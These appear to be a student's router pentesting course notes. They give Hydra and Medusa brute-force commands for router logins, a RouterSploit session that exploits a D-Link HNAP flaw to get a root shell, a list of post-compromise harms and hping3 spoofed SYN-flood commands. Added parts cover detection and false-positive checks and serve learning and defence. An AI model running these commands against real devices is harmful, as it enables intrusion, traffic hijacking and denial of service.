Title: router_pentesting
Author: unknowndevice64
Router Pentesting
Web Applications
Web Sites

Three different scenarios

1. People buy a router and never change the web interface's credentials
Default username
Default password

1. Physical access to the router
The default credentials are printed on a sticker on the bottom of the router.
2. Look the defaults up on open-source default-password sites
First find out which company made the router (the sticker, the login page banner, or the vendor prefix of its MAC address)
#route -n ---> prints the routing table; the line flagged UG is the default gateway, i.e. the router
Enter that IP address in the browser to reach the login page

2. When people get a little smarter, they change the router's password
We often still know (or can guess) the username, e.g. admin, but the password is now unknown to us, so it has to be brute forced.

Brute force
1. Hydra
2. Medusa

1. Hydra -->
One of the best tools for brute forcing logins over many different services and protocols.
Any protocol that requires authentication (user id | password) can be attacked as long as Hydra has a module for it.

I know that
username --> Admin
password --> ?
I tell Hydra that the username is Admin (-l) and give it a password list (-P)
password --> brute force

#hydra -l Admin -P /usr/share/wordlists/rockyou.txt <router-ip> http-get /
(the target IP and the protected path must be given; the notes left them out)

Result in the notes: "16 valid entries, among which one of them will be my password."
That is almost always a false positive, not 16 passwords. Hydra's http-get module treats any reply that is not 401/403 as a valid login, and it runs 16 parallel tasks by default (-t 16). If the path you gave is not actually protected by HTTP Basic auth (it answers 200 to everybody, or the router uses a form login instead), every task reports its first guess as "valid" and you get exactly 16 hits.
Check first that an unauthenticated request to that path returns 401 with a WWW-Authenticate: Basic header. If it does not, fix the path, or switch to the http-post-form module for a form-based login.
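The pre-flight check described above, as an added example that is not part of the original notes or of Hydra itself: a minimal HTTP Basic brute force of the kind hydra http-get performs, preceded by the check that an anonymous request is actually rejected. The in-process "router", its realm, the credentials admin / sunshine and the wordlist are all constructed for the example.

```python
"""Added example, not part of the original notes: the pre-flight check that
explains the "16 valid entries" result, plus a minimal HTTP Basic brute force
of the kind hydra http-get performs.

Everything here is constructed: the in-process fake router, its realm, the
credentials admin / sunshine and the tiny wordlist. Point it only at a target
you own."""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

VALID_USER, VALID_PASS = "admin", "sunshine"   # constructed router credentials


class FakeRouter(BaseHTTPRequestHandler):
    """/ is a public status page (200 for everyone); /admin needs Basic auth."""

    def log_message(self, *args):      # silence request logging
        pass

    def do_GET(self):
        if self.path != "/admin":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"status page, no login needed")
            return
        expected = "Basic " + base64.b64encode(
            f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"admin panel")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Router"')
            self.end_headers()


def start_router():
    """Start the fake router on a free localhost port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), FakeRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def status_of(url, user=None, password=None):
    """HTTP status of a GET, optionally with a Basic Authorization header."""
    req = Request(url)
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urlopen(req, timeout=3) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def brute_force(base_url, path, users, passwords):
    """Returns (outcome, credentials).

    Pre-flight: an anonymous request must get 401. If it gets 200 the path is
    not protected by Basic auth (or the router uses a form login), and a tool
    that treats "not 401/403" as success would report every guess as valid,
    one hit per parallel task, hence hydra's 16 "valid" entries."""
    if status_of(base_url + path) != 401:
        return "preflight-failed", None
    for user in users:
        for pw in passwords:
            if status_of(base_url + path, user, pw) == 200:
                return "found", (user, pw)
    return "exhausted", None


if __name__ == "__main__":
    srv, base = start_router()
    wordlist = ["123456", "password", "admin", "sunshine"]   # constructed
    print("/      ->", brute_force(base, "/", ["admin"], wordlist))
    print("/admin ->", brute_force(base, "/admin", ["admin"], wordlist))
    srv.shutdown()
```

Run it as a script: the unprotected path fails the pre-flight and no guessing happens, the protected path yields the single admin:sunshine pair. Against a real router replace the fake server with the router's IP and the path that produced the 401.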

2. Medusa
Medusa is a parallel, modular brute forcer similar to Hydra. Its strengths are thread-based parallel testing (many hosts, users or passwords at once) and cleanly separated service modules; against some HTTP logins it behaves more reliably than Hydra.
When the path and module are right, both tools report exactly one username:password pair; a long list of "valid" results means the check itself is wrong, not that one tool is more accurate than the other.
The notes claim Hydra supports only a limited set of modules; that is not true, Hydra actually supports more protocols than Medusa. Both cover the ones that matter for routers (http, ssh, telnet, ftp, snmp).
modules ---> protocols

#medusa -h <router-ip> -u Admin -P /usr/share/wordlists/rockyou.txt -e n -M http -m DIR:/<protected-path>
-h --> target host (the notes left it empty)
-u --> single username
-P --> password list
-e n --> additionally try an empty password
-M http --> module (HTTP Basic auth by default)
-m DIR:<path> --> module option: the protected path to request (default /)

success message ---> ACCOUNT FOUND: [http] Host: <router-ip> User: Admin Password: ********** [SUCCESS]

3. Those who are very careful change both the username and the password.
Then both have to be guessed, so a username list is given as well:

1. #hydra -L <userlist> -P /usr/share/wordlists/rockyou.txt <router-ip> http-get /
2. #medusa -h <router-ip> -U <userlist> -P /usr/share/wordlists/rockyou.txt -M http

The notes use rockyou.txt as the username list too; it is a password list of about 14 million entries, and every username multiplies the whole password list. Use a short list of likely admin names instead (admin, administrator, root, user, support, the vendor's name).

Router Exploitation Framework ---> routersploit framework
google --> routersploit framework github
click on "Download or clone" --> copy the link
Open the terminal
#git clone https://github.com/reverse-shell/routersploit.git
(the project has since moved to https://github.com/threat9/routersploit; the old URL redirects there)
Routersploit is downloaded into your Linux operating system
#cd routersploit
#pip install -r requirements.txt ---> install its Python dependencies first, otherwise rsf.py fails on import
#ls ---> rsf.py --> the executable entry point

root@kali:~/tools/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       IoT Exploitation Framework    |_|

Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version : 2.2.1

Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10

rsf >

rsf > help
Global commands:
help Print this help menu
use <module> Select a module for usage
exec <shell command> <args> Execute a command in a shell
search <search term> Search for appropriate module
exit Exit RouterSploit
rsf > use
creds exploits payloads scanners
rsf > use scanners/
scanners/2wire_scan scanners/cameras_scan scanners/juniper_scan scanners/routers_scan
scanners/3com_scan scanners/cisco_scan scanners/linksys_scan scanners/shuttle_scan
scanners/asmax_scan scanners/comtrend_scan scanners/misc_scan scanners/technicolor_scan
scanners/asus_scan scanners/dlink_scan scanners/movistar_scan scanners/thomson_scan
scanners/autopwn scanners/fortinet_scan scanners/multi_scan scanners/tplink_scan
scanners/belkin_scan scanners/grandstream_scan scanners/netcore_scan scanners/ubiquiti_scan
scanners/bhu_scan scanners/huawei_scan scanners/netgear_scan scanners/zte_scan
scanners/billion_scan scanners/ipfire_scan scanners/netsys_scan scanners/zyxel_scan
rsf > use scanners/autopwn

rsf (AutoPwn) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target IP address e.g.
port 80 Target port

Module options:

Name Current settings Description
---- ---------------- -----------
threads 8 Number of threads

rsf (AutoPwn) > set target <router-ip>
[+] {'target': '<router-ip>'}
rsf (AutoPwn) > (pressing tab twice lists the commands available inside a module)
back check exec exit help run search set setg show use
rsf (AutoPwn) > run

[*] Could not verify exploitability: (printed in blue: the module's check could not decide, these would have to be tried by hand)
- exploits/routers/billion/5200w_rce
- exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
- exploits/routers/dlink/dsl_2640b_dns_change
- exploits/routers/dlink/dsl_2740r_dns_change
- exploits/routers/dlink/dir_815_850l_rce
- exploits/routers/shuttle/915wm_dns_change
- exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
- exploits/routers/cisco/secure_acs_bypass
- exploits/routers/cisco/catalyst_2960_rocem

[+] Device is vulnerable: (printed in green: the module's check succeeded)
- exploits/routers/dlink/multi_hnap_rce

rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) > show options

Target options:

Name Current settings Description
---- ---------------- -----------
target Target address e.g.
port 80 Target Port

rsf (D-Link Multi HNAP RCE) > set target <router-ip>
[+] {'target': '<router-ip>'}
rsf (D-Link Multi HNAP RCE) > run

cmd> --> a command shell on the router (commands run on the device's firmware, as root on most home routers)

Organisations ----> use Cisco routers (enterprise gear, not the home routers above)
Microsoft --> Windows
Linux --> Red Hat | Fedora | Ubuntu
Cisco router --> IOS
IOS --> Internetwork Operating System (Cisco's router/switch OS, not Apple's iOS)

Cisco Packet Tracer ---> simulator for routers and switches (used by network administrators / CCNA)

Harm that can be done from the router's shell
Implant a backdoor (persistent access; survives reboots if written to flash)
Port forwarding (expose internal hosts to the internet)
Change the authentication (lock the owner out)
Block MAC addresses --> MAC filtering
Network traffic monitoring (every packet of the LAN passes through the router; DNS can also be redirected, which is what the *_dns_change exploits above do)

DoS Attack
A denial-of-service attack is one in which a single user sends a huge number of requests to a host, creating far more traffic than the server can handle. The server slows down, may crash, and is unavailable for some time.

www.amazon.com ---> if I launch a DoS attack on it ----> the site becomes slow.
Users get frustrated and buy from Amazon's competitors instead.

Typical extortion mail (illustration):
Hello Sir,
I have a botnet of 10,000 devices. Pay me $50,000 USD or I will launch a DoS/DDoS attack on your server.
Bitcoin address ----> ************
With love

Hello Attacker,
Please do not launch any such attack. We are ready to pay you the requested amount ASAP.

How a simple single-source DoS shows up, and what to do:
Packet/request rate or size --> far above normal (greater than a threshold xxx)
Data is coming from a single IP address
It is sending continuously, without pausing
Block that IP address (firewall drop rule, or rate limit it)
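The detection rule above (one source, high rate, continuous), as an added example that is not part of the original notes: a sliding-window counter over connection-log lines that flags the source to block, and also recognises the case the rule misses, a flood spread over many spoofed sources (hping3 --rand-source, or a DDoS) where no single IP stands out. The log format, every log line and the thresholds are constructed for the example.

```python
"""Added example, not part of the original notes: flag a single-source flood
from connection-log lines and tell it apart from a spoofed/distributed one.

Assumptions: the log format "<epoch-seconds> <src-ip> <dst-port> <bytes>" and
every line below are constructed for the example; the thresholds are guesses
to be tuned to the real link."""
from collections import defaultdict, deque

# Constructed log: one line per inbound packet. 203.0.113.7 hammers port 443.
SAMPLE_LOG = """\
1558200000 198.51.100.20 443 1420
1558200000 203.0.113.7 443 60
1558200000 203.0.113.7 443 60
1558200001 203.0.113.7 443 60
1558200001 203.0.113.7 443 60
1558200001 203.0.113.7 443 60
1558200002 192.0.2.9 80 900
1558200002 203.0.113.7 443 60
1558200002 203.0.113.7 443 60
1558200002 203.0.113.7 443 60
"""

# Constructed --rand-source style flood: 30 packets in one second, every one
# from a different (spoofed) source, so no single IP stands out.
SPOOFED_LOG = "".join(f"1558200000 198.51.100.{i} 443 60\n" for i in range(1, 31))


def parse(log_text):
    """Turn log lines into (timestamp, src_ip, dst_port, size) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, port, size = line.split()
        events.append((int(ts), src, int(port), int(size)))
    return events


def find_floods(events, window_s=2, per_ip_limit=5, total_limit=20):
    """Sliding-window rate check.

    Returns (flagged_ips, spoofed_flood):
      flagged_ips   - sources that sent more than per_ip_limit packets within
                      any window_s-second window (the "single IP, continuous
                      traffic" case in the notes: block these).
      spoofed_flood - True when the total rate exceeds total_limit although no
                      single source is over its limit, i.e. the traffic is
                      spread over many or spoofed sources (hping3 --rand-source,
                      or a DDoS) and a per-IP block will not help.
    """
    per_ip = defaultdict(deque)
    total = deque()
    flagged = set()
    spoofed = False
    for ts, src, _port, _size in sorted(events):
        q = per_ip[src]
        q.append(ts)
        while ts - q[0] >= window_s:   # drop packets that fell out of the window
            q.popleft()
        if len(q) > per_ip_limit:
            flagged.add(src)
        total.append(ts)
        while ts - total[0] >= window_s:
            total.popleft()
        if len(total) > total_limit and not flagged:
            spoofed = True
    return flagged, spoofed


def block_rules(ips):
    """Firewall drop rules for the flagged sources (iptables syntax)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(ips)]


if __name__ == "__main__":
    for name, log in (("single source", SAMPLE_LOG), ("spoofed", SPOOFED_LOG)):
        flagged, spoofed = find_floods(parse(log))
        print(name, "-> flagged:", sorted(flagged), "spoofed flood:", spoofed)
        for rule in block_rules(flagged):
            print("  ", rule)
```

On the first log only 203.0.113.7 crosses the per-source limit and a single drop rule handles it; on the second log nobody does, yet the aggregate rate is far above normal, which is the signal to move to rate limiting or upstream filtering rather than per-IP blocks.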

DDoS --> Distributed Denial of Service
A kind of DoS attack in which many machines (a botnet) all send traffic to the target at once. Blocking one source IP no longer helps, and a spoofed-source flood (see --rand-source below) looks the same from the victim's side.

hping3 --> network tool used for
Testing firewalls
Testing TCP/IP connections
Testing IDS and IPS
Scanning open ports
Generating traffic over the network (the DoS use here)

#hping3 --flood --rand-source -S -c 500000 -d 12000 -p 8080 <target-ip>
hping3 --> the tool; the target IP address goes at the end (the notes left it out)
--flood --> send packets as fast as possible, without waiting for replies
--rand-source --> use a random spoofed source IP address for every packet
-S --> set the SYN flag (added here; without a flag hping3 sends TCP packets with no flags set, which most targets simply drop)
-c --> count --> how many packets to send
-d --> size --> size of the data in one packet (12000 bytes is larger than an Ethernet MTU, so every packet is fragmented on the wire)
-p --> destination port number

#hping3 --flood --rand-source -S -c 500000 -d 12000 -p 443 <target-ip>
Needs root. With --rand-source the replies go to the spoofed addresses, so hping3 shows nothing coming back. Only use it against a target you own or are authorised to test.

There are 4 different types of HTTP authentication
1. Basic Authentication --> browser pop-up; the credentials travel base64-encoded in the Authorization header (hydra http-get / medusa -M http)
2. Integrated Authentication --> Windows NTLM / Kerberos (Negotiate); used by IIS, not by home routers
3. Digest Authentication --> same pop-up, but a hash of the password with a server nonce is sent instead of the password itself
4. Form-based Authentication --> an HTML login form; the page returns 200 and the credentials are POSTed (hydra http-post-form / medusa -M web-form)
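Telling the four types apart from the router's first HTTP response, as an added example that is not part of the original notes: it parses the WWW-Authenticate challenges (several can share one header, each with comma-separated parameters) and looks for a password field in the body, then maps the result to the brute-force module to use. The sample responses are constructed; the module hints are the ones I would reach for, so confirm the exact syntax with `hydra -U <module>` and `medusa -M <module> -q`.

```python
"""Added example, not part of the original notes: work out which of the four
authentication types a router login uses from its first HTTP response, so the
right Hydra / Medusa module is chosen before any brute forcing starts.

The sample responses are constructed. The module hints are the ones I would
reach for; confirm the exact syntax with `hydra -U <module>` and
`medusa -M <module> -q`."""
import re

# RFC 7235 grammar pieces: a challenge is "<scheme> param=value, param=value";
# several challenges may share one header, also comma separated.
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
PARAM = rf"{TOKEN}\s*=\s*(?:{QUOTED}|{TOKEN})"
CHALLENGE = re.compile(rf"({TOKEN})(?:\s+{PARAM}(?:\s*,\s*{PARAM})*)?")
SEP = re.compile(r"\s*,\s*")
PASSWORD_FIELD = re.compile(r"<input[^>]*type\s*=\s*['\"]?password", re.I)

MODULE_HINT = {
    "basic": "hydra <ip> http-get /path  |  medusa -M http (AUTH:BASIC is the default)",
    "digest": "hydra <ip> http-get /path (hydra answers the Digest challenge)  |  medusa -M http -q for AUTH options",
    "integrated": "NTLM/Negotiate (IIS, not home routers): medusa -M http -m AUTH:NTLM",
    "form": "hydra <ip> http-post-form '/login:user=^USER^&pass=^PASS^:F=failed'  |  medusa -M web-form",
    "none": "no challenge and no form: wrong path, or a JavaScript/API login; inspect it in the browser",
}


def parse_challenges(header_value):
    """Return the scheme names in one WWW-Authenticate header, in order.
    'Digest realm="r", qop="auth", Basic realm="r"' -> ['digest', 'basic']"""
    schemes, pos = [], 0
    while pos < len(header_value):
        m = CHALLENGE.match(header_value, pos)
        if not m:
            break
        schemes.append(m.group(1).lower())
        pos = m.end()
        sep = SEP.match(header_value, pos)
        pos = sep.end() if sep else len(header_value)
    return schemes


def classify_auth(status, headers, body):
    """headers: list of (name, value) pairs exactly as received (a server may
    send several WWW-Authenticate headers). Returns (kind, schemes_offered).
    When Basic is offered next to Digest, Basic is the one to attack: the
    password travels base64-encoded, with no nonce, and the tools handle it best."""
    schemes = []
    for name, value in headers:
        if name.lower() == "www-authenticate":
            schemes.extend(parse_challenges(value))
    if status == 401 and schemes:
        if "basic" in schemes:
            return "basic", schemes
        if "digest" in schemes:
            return "digest", schemes
        if "ntlm" in schemes or "negotiate" in schemes:
            return "integrated", schemes
        return "other", schemes
    if PASSWORD_FIELD.search(body):
        return "form", schemes
    return "none", schemes


# Constructed responses from four hypothetical router firmwares.
SAMPLES = {
    "basic_only": (401, [("Server", "httpd"), ("WWW-Authenticate", 'Basic realm="Router"')], ""),
    "digest_and_basic": (401, [("WWW-Authenticate",
                                'Digest realm="Router", qop="auth", nonce="0a1b2c", Basic realm="Router"')], ""),
    "form_login": (200, [("Content-Type", "text/html")],
                   '<form action="/login.cgi" method="post">'
                   '<input name="user"><input type="password" name="pass"></form>'),
    "open_page": (200, [("Content-Type", "text/html")], "<html><body>status</body></html>"),
}

if __name__ == "__main__":
    for label, (status, headers, body) in SAMPLES.items():
        kind, schemes = classify_auth(status, headers, body)
        print(f"{label:17} -> {kind:10} offered={schemes}  use: {MODULE_HINT.get(kind, '?')}")
```

The "open_page" case is the one behind the 16 false positives in the Hydra section: a 200 with no challenge and no form means the path is wrong, and no brute-force module will give a meaningful answer there.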
Task --> run Medusa against your own router

Submitted On: 2019-05-18 20:31:16